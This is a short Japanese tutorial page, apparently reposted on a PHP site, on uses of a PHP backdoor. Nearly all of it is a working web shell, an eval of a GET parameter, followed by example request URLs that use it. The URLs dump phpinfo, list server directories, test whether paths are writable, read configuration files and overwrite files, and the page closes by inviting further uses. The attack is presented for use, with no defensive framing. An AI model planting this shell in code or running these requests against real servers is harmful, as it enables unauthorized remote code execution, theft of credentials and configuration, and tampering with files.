ホームページ > バックエンド開発 > PHPチュートリアル > PHP バックドアのいくつかの使用法

PHP バックドアのいくつかの使用法

藏色散人
リリース: 2023-04-06 20:20:02
転載
7074 人が閲覧しました

今日は、PHP バックドアの最も一般的な使用法のいくつかについて説明します。

まず、最も単純なバックドア (トロイの木馬とも呼ばれる) を作成します。

<?php eval($_GET[&#39;evl&#39;]);
ログイン後にコピー

これで、このサーバー上で多くの実行権限を取得できました。

そのシーンはどのような用途に使われますか?

プリント サーバーphpinfo

http://www.test.com/a.php?evl=phpinfo()
ログイン後にコピー

ディレクトリ内にどのようなファイルがあるかを確認します

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));
ログイン後にコピー

ディレクトリが書き込み可能かどうかを確認します。次のステップです。書き込み可能なディレクトリに実行可能ファイルを作成できます

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));
ログイン後にコピー

ファイルのコンテンツを取得します。通常は構成を読み取るために使用されます

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));
ログイン後にコピー

書き込み可能なディレクトリにファイルを書き込みます

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));
ログイン後にコピー

わかりました, 上記の部分は基本的にサーバーを表示するために使用できる部分を破壊したので、他の機能について推論してみましょう。

以上がPHP バックドアのいくつかの使用法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
ソース:aliyun.com
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート